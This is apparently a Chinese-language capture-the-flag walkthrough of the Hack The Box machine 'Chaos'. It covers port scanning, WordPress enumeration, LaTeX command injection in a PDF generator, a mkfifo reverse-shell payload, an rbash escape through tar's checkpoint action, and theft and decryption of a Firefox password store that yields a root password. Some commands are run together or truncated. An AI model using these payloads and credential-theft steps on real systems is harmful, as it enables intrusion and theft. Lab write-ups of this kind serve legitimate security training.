nmap扫描结果:
80/tcp open http
|_http-title: Site doesn’t have a title (text/html).
110/tcp open pop3
143/tcp open imap
|_imap-capabilities: LITERAL+ listed more STARTTLS ID LOGIN-REFERRALS IDLE ENABLE post-login capabilities Pre-login IMAP4rev1 OK LOGINDISABLEDA0001 have SASL-IR
|_ssl-date: TLS randomness does not represent time
10000/tcp open snet-sensor-mgmt
| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on chaos
| Not valid before: 2018-10-28T12:45:28
|_Not valid after: 2023-10-27T12:45:28
|_ssl-date: TLS randomness does not represent time
端口对应服务访问:
https://10.10.10.120:10000/ —->webmin登录 —>默认及常规密码无效—>且错误密码过多被拒绝登录
http://10.10.10.120/wp/wordpress/ —>Wordpress网站
http://10.10.10.120/wp/wordpress/ —> 密码保护文章
wpscan --url http://10.10.10.120/wp/wordpress/ -e ap -e u得到用户名humanWordPress version 4.9.8
使用 human 解开密码保护文章:
Creds for webmail :username – ayushpassword – jiujitsu
python脚本内容为AES加密,解密:
https://raw.githubusercontent.com/happygirlzt/Cryptography/master/encrypt.py
kali@kali:~$ python encrypt.pyWould you like to (E)ncrypt of (D)ecrypt?: 'D'File to decrypt: 'enim_msg.txt'Password: 'sahay'Done.kali@kali:~$ cat enim_msg.txt_decSGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK --- >得到链接:http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3 --->创建PDF
test1无法生成;但是test2和test3可以
目录扫描发现:
http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/doc/latex/adjustbox/ —>latex可能存在命令注入???
\immediate\write18{id}
反弹shell:###由于latex对 & 等字符解析存在问题;
[方法1]需要对 & ;进行编码
[方法2]使用python反弹shell
[方法3]构造无 &符号nc payload
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 0/tmp/f使用前边邮箱账户密码成功登录ayush用户:—> rbash: cd: restricted
绕过rbash限制:
https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
常规方法不能绕过,最终绕过paylaod
tar cf /dev/null rick.tar --checkpoint=1 --checkpoint-action=exec=/bin/bashayush@chaos:/home$ echo $PATHecho $PATH/home/ayush/.app###需要修复路径:export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
用户目录下发现.mozilla文件夹。切换到该目录并开启SimpleHTTPServer,本机下载改目录下的凭证回来解开
wget http://10.10.10.120:8000/ --recursive在firefox/bzo7sjt1.default/目录中发现key4.db和logins.json
解密凭证:
https://raw.githubusercontent.com/unode/firefox_decrypt/master/firefox_decrypt.py
kali@kali:~/10.10.10.120:8000/firefox/bzo7sjt1.default$ python firefox_decrypt.py /home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default2020-04-20 06:05:13,798 - WARNING - profile.ini not found in /home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default2020-04-20 06:05:13,798 - WARNING - Continuing and assuming '/home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default' is a profile locationMaster Password for profile /home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default:Website: https://chaos.htb:10000Username: 'root'Password: 'Thiv8wrej~'
